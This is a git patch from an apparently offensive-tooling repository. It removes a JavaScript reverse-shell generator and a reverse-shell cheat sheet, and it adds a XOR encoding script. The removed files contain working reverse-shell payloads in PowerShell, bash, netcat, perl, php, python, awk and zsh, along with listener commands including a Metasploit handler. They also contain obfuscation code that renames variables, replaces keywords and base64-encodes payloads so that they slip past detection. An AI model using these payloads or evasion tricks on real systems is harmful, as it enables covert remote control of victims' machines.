From 25e91c47d18397ec105acc52fdd833dc20777be4 Mon Sep 17 00:00:00 2001 From: PrincessPi3 Date: Tue, 26 May 2026 21:23:37 -0600 Subject: [PATCH] migration --- assets/silly.js | 267 ------------------------------------------ powershell-notes.txt | 76 ++++++++++++ revshells-listing.txt | 118 ------------------- xorencode.ps1 | 15 +++ 4 files changed, 91 insertions(+), 385 deletions(-) delete mode 100644 assets/silly.js create mode 100644 powershell-notes.txt delete mode 100644 revshells-listing.txt create mode 100644 xorencode.ps1 diff --git a/assets/silly.js b/assets/silly.js deleted file mode 100644 index 107bcfb..0000000 --- a/assets/silly.js +++ /dev/null @@ -1,267 +0,0 @@ -const psOne = '$LHOST = ""; $LPORT = ; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()'; - -const psTwo = 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient("",);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"'; - -const psThree = 'powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient("", );$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + "SHELL> ");$StreamWriter.Flush()}WriteToStream "";while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"'; - -const psFourTLS = '$sslProtocols = [System.Security.Authentication.SslProtocols]::Tls12; $TCPClient = New-Object Net.Sockets.TCPClient("", );$NetworkStream = $TCPClient.GetStream();$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient("cloudflare-dns.com",$null,$sslProtocols,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}$StreamWriter = New-Object IO.StreamWriter($SslStream);function WriteToStream ($String) {[byte[]]$script:Buffer = New-Object System.Byte[] 4096 ;$StreamWriter.Write($String + "SHELL> ");$StreamWriter.Flush()};WriteToStream "";while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()'; - -const psRevRaw = [psOne, psTwo, psThree, psFourTLS]; - -const listenerOne = 'nc -lvnp '; // nc cleartext tcp - -const listenerTwo = 'nc -u -lvp '; // nc cleartext udp - -const listenerThree = 'sudo ncat -lvnp '; // ncat cleartext tcp - -const listenerFour = 'sudo ncat --ssl -lvnp '; // ncat TLS // issues with this so far - -const listenerFive = 'sudo openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 30 -nodes; sudo openssl s_server -quiet -key key.pem -cert cert.pem -port ' // openssl TLS - -const listenerSix = 'sudo msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 127.0.0.1; set lport ; exploit"' // msfconsole (metasploit) TCP // needs testing - -const listenerSeven = 'sudo msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_udp; set lhost 127.0.0.1; set lport ; exploit"' // msfconsole (metasploit) UDP // needs testing - -const listenersRaw = [listenerOne, listenerTwo, listenerThree, listenerFour, listenerFive, listenerSix, listenerSeven]; - -// mangle -const mangleExprPre = '$mangledStr=\''; -const mangleExprPost = '\';$staticStrArr="new","net","client","tcp","object","new","mkfifo","socket","tmp","security","ssl","stream","\$","buff","out","system","proto","expre","invoke","flush","auth",".",";";$replaceStrArr="dfi1","wiggleworm","nOt4t0","d00d1eb0p","unpotat","soiledpeanuts","tinylittledragons","thetiniestofhorses","capitalismisascam","bramblebush","ins4ecureSilly","456yt","\@\@\@\^","muscleperverts","inniebellybutton","ponishouldponiponi","ayylemone","testicles","lololol","teppidwater","orderhotwaterataniceresteraunt","deee","onoamouse";$demangledStr=$mangledStr;for($i=0;$i -le $staticStrArr.length;$i++){$demangledStr = $demangledStr -replace $replaceStrArr[$i],$staticStrArr[$i]};invoke-expression $demangledStr&' - -const replaceStrArr = ['dfi1', 'wiggleworm', 'nOt4t0', 'd00d1eb0p', 'unpotat', 'soiledpeanuts', 'tinylittledragons', 'thetiniestofhorses', 'capitalismisascam','bramblebush', 'ins4ecureSilly', '456yt', '@@@^', 'muscleperverts', 'inniebellybutton', 'ponishouldponiponi', 'ayylemone', 'testicles', 'lololol', 'teppidwater', 'orderhotwaterataniceresteraunt', 'deee', 'onoamouse']; - -const findStrArr = [/new/gi, /net/gi, /client/gi, /tcp/gi, /object/gi, /new/gi, /mkfifo/gi, /socket/gi, /tmp/gi, /security/gi, /ssl/gi, /stream/gi, /\$/gi, /buff/gi, /out/gi, /system/gi, /proto/gi, /expre/gi, /invoke/gi, /flush/gi, /auth/gi, /\./gi, /;/gi]; - -const staticStrArr = ['new', 'net', 'client', 'tcp', 'object', 'new', 'mkfifo', 'socket', 'tmp', 'security', 'ssl', 'stream', '$', 'buff', 'out', 'system', 'proto', 'expre', 'invoke', 'flush', 'auth', '.', ';']; - -function setContents(elemId, elemContents) { - document.getElementById(elemId).innerHTML = elemContents; -} - -function showId(elemId) { - document.getElementById(elemId).style.display = "block"; -} - -function hideId(elemId) { - document.getElementById(elemId).style.display = "none"; -} - -function getVal(elemId) { - return document.getElementById(elemId).value; -} - -function mangleRevShell(revShellStr) { - let mangiemut = revShellStr; - - for(let i=0; i> 4) - { - case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: - // 0xxxxxxx - out += str.charAt(i-1); - break; - case 12: case 13: - // 110x xxxx 10xx xxxx - char2 = str.charCodeAt(i++); - out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F)); - out += str.charAt(i-1); - break; - case 14: - // 1110 xxxx 10xx xxxx 10xx xxxx - char2 = str.charCodeAt(i++); - char3 = str.charCodeAt(i++); - out += String.fromCharCode(((c & 0x0F) << 12) | ((char2 & 0x3F) << 6) | ((char3 & 0x3F) << 0)); - break; - } - } - - var byteArray = new Uint8Array(out.length * 2); - for (var i = 0; i < out.length; i++) { - byteArray[i*2] = out.charCodeAt(i); // & 0xff; - byteArray[i*2+1] = out.charCodeAt(i) >> 8; // & 0xff; - } - - return String.fromCharCode.apply( String, byteArray ); -} - -function genShell() { - const rstype = document.getElementById("rstype").value; - const psRevStringRaw = psRevRaw[rstype]; - encodePS(psRevStringRaw); -} - -function randInt(min=2, max=7) { - const minCeil = Math.ceil(min); - const maxFloor = Math.floor(max); - return Math.floor(Math.random() * (maxFloor - minCeil) + minCeil); -} - -function randVarname(minLen=2, maxLen=7, charSet='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789') { - let out = ''; - const randLen = randInt(minLen, maxLen); - const charsLen = charSet.length; - - for (let i=0; i/gi, host); - moddedCmdString = moddedCmdString.replaceAll(//gi, port); - - // moddedCmdString = moddedCmdString.replaceAll(//gi, shell); // for when we evolve past ps lmao - return moddedCmdString; -} - -function psEncodeBase64Exe(shellStr) { - // for `powershell -e $base64EncodedData` to work, the commands need to be first encoded into Unicode/UTF-16 LE (Windows default) than base64 encoded - const psEncodedlUTF16LE = encodeUTF16LE(shellStr); - const base64EncodedPSExecutable = "powershell -e " + btoa(psEncodedlUTF16LE); - return base64EncodedPSExecutable; -} - -function encodePS(rawShellString, listenerShow=true) { - const host = getVal("host"); - const port = getVal("port"); - const rstype = getVal("listenertype"); - const minLen = getVal("minLen"); - const maxLen = getVal("maxLen"); - - let matchies = rawShellString.match(/\$(?!null|zero|false|true|script|buffer)[a-z0-9-_]{1,30}/gi); - - if(matchies) { - const varsLen = matchies.length; - - let randVarSubArr = new Array(); - var moddedCmdString = configShell(rawShellString, host, port); - - for(let i=0; i; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close() - - powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" - - powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('', );$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()" - - C='curl -Ns telnet://:'; $C &1 | 2>&1 | $C >/dev/null - - // udp - rm /tmp/f;mkfifo /tmp/f;cat /tmp/f| -i 2>&1|ncat -u >/tmp/f - - ncat.exe -e - - ncat -e - - nc -c - - nc -e - - nc.exe -e - - perl -e 'use Socket;$i="";$p=;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec(" -i");};' - - perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,":");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' - - php -r '$sock=fsockopen("",);exec(" <&3 >&3 2>&3");' - - php -r '$sock=fsockopen("",);shell_exec(" <&3 >&3 2>&3");' - - php -r '$sock=fsockopen("",);system(" <&3 >&3 2>&3");' - - php -r '$sock=fsockopen("",);passthru(" <&3 >&3 2>&3");' - - php -r '$sock=fsockopen("",);` <&3 >&3 2>&3`;' - - php -r '$sock=fsockopen("",);popen(" <&3 >&3 2>&3", "r");' - - php -r '$sock=fsockopen("",);$proc=proc_open("", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);' - - - - TLS: // giving cert error on ncat TLS listener - $sslProtocols = [System.Security.Authentication.SslProtocols]::Tls12; $TCPClient = New-Object Net.Sockets.TCPClient('', );$NetworkStream = $TCPClient.GetStream();$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$sslProtocols,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}$StreamWriter = New-Object IO.StreamWriter($SslStream);function WriteToStream ($String) {[byte[]]$script:Buffer = New-Object System.Byte[] 4096 ;$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()};WriteToStream '';while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close() - - openssl: - mkfifo /tmp/s; -i < /tmp/s 2>&1 | openssl s_client -quiet -connect : > /tmp/s; rm /tmp/s - *nix: - awk 'BEGIN {s = "/inet/tcp/0//"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null - - zsh -c 'zmodload zsh/net/tcp && ztcp && zsh >&$REPLY 2>&$REPLY 0>&$REPLY' - - TF=$(mktemp -u);mkfifo $TF && telnet 0<$TF | bash 1>$TF - - // udp - -i >& /dev/udp// 0>&1 - - -i 5<> /dev/tcp// 0<&5 1>&5 2>&5 - - exec 5<>/dev/tcp//;cat <&5 | while read line; do $line 2>&5 >&5; done - - 0<&196;exec 196<>/dev/tcp//; <&196 >&196 2>&196 - - -i >& /dev/tcp// 0>&1 - - rm /tmp/f;mkfifo /tmp/f;cat /tmp/f| -i 2>&1|nc >/tmp/f - - python: - : "bash", "powershell", "zsh", "cmd", etc - - export RHOST="";export RPORT=;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("")' - - python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("")' - - python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("")' - - python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("",));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("")' - - windows: - ``` - import os,socket,subprocess,threading; - def s2p(s, p): - while True: - data = s.recv(1024) - if len(data) > 0: - p.stdin.write(data) - p.stdin.flush() - - def p2s(s, p): - while True: - s.send(p.stdout.read(1)) - - s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) - s.connect(("",)) - - p=subprocess.Popen([""], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE) - - s2p_thread = threading.Thread(target=s2p, args=[s, p]) - s2p_thread.daemon = True - s2p_thread.start() - - p2s_thread = threading.Thread(target=p2s, args=[s, p]) - p2s_thread.daemon = True - p2s_thread.start() - - try: - p.wait() - except KeyboardInterrupt: - s.close() - ``` - - - -Listeners: - ncat TLS: - sudo ncat --ssl -lvnp \ No newline at end of file diff --git a/xorencode.ps1 b/xorencode.ps1 new file mode 100644 index 0000000..244865e --- /dev/null +++ b/xorencode.ps1 @@ -0,0 +1,15 @@ +param ( + [Parameter(Mandatory=$true)] + [byte]$key, + [string]$cmd +) + +$bytes=[System.Text.Encoding]::UTF8.GetBytes($cmd) + +for($i = 0; $i -lt $bytes.length; $i++) { + $bytes[$i]=$bytes[$i] -bxor $key +} + +$bytes + +[System.Text.Encoding]::UTF8.GetString($bytes) \ No newline at end of file